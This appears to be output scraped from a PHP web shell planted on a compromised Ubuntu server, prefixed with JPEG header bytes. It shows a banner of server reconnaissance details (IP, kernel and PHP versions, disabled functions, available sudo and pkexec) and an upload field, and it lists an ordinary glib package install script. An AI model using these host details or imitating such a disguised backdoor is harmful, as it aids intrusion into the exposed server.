????JFIF??x?x????'
Server IP : 79.136.114.73 / Your IP : 216.73.216.221 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/lib/dpkg/info_silent/ |
Upload File : |
#!/bin/sh set -e if [ "$1" = triggered ]; then for trigger in $2; do if ! [ -d $trigger ]; then continue fi case $trigger in /usr/share/glib-2.0/schemas) # This is triggered everytime an application installs a # GSettings schema /usr/lib/x86_64-linux-gnu/glib-2.0/glib-compile-schemas /usr/share/glib-2.0/schemas || true ;; /usr/lib/x86_64-linux-gnu/gio/modules|/usr/lib/gio/modules) # This is triggered everytime an application installs a GIO # module into /usr/lib/x86_64-linux-gnu/gio/modules or the # backwards-compatible /usr/lib/gio/modules directory # The /usr/lib/gio/modules directory is no longer shipped by # libglib2.0 itself so we need to check to avoid a warning from # gio-querymodules dirs=/usr/lib/x86_64-linux-gnu/gio/modules if [ -d /usr/lib/gio/modules ] && [ $(dpkg --print-architecture) = amd64 ]; then dirs="$dirs /usr/lib/gio/modules" fi /usr/lib/x86_64-linux-gnu/glib-2.0/gio-querymodules $dirs || true ;; esac done exit 0 fi # Automatically added by dh_makeshlibs if [ "$1" = "configure" ]; then ldconfig fi # End automatically added section # Also handle the initial installation if [ -d /usr/share/glib-2.0/schemas ]; then /usr/lib/x86_64-linux-gnu/glib-2.0/glib-compile-schemas /usr/share/glib-2.0/schemas || true fi if [ -d /usr/lib/x86_64-linux-gnu/gio/modules ]; then /usr/lib/x86_64-linux-gnu/glib-2.0/gio-querymodules /usr/lib/x86_64-linux-gnu/gio/modules || true fi if [ -d /usr/lib/gio/modules ] && [ $(dpkg --print-architecture) = amd64 ]; then /usr/lib/x86_64-linux-gnu/glib-2.0/gio-querymodules /usr/lib/gio/modules || true fi